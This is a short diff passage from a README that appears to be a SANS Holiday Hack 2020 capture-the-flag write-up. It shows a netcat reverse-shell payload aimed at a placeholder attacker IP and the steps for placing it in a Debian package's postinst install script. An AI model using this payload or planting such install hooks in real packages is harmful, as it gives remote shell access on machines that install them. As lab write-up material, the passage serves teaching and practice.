jeshuaerickson/holidayhack2020/README.md

 nc -e /bin/sh ATTACKING-IP 4444
 ~~~

-- Step 8: Build the deb package with the above payload in the "postinst"
+- Step 8: Build the deb package with the above payload in the "postinst". *Note: that one payload line is ALL you need in the postinst file; nothing else!"*

 	- "dpkg -x [debfile] work"
 	- "mkdir work/DEBIAN"
  	- "cd DEBIAN"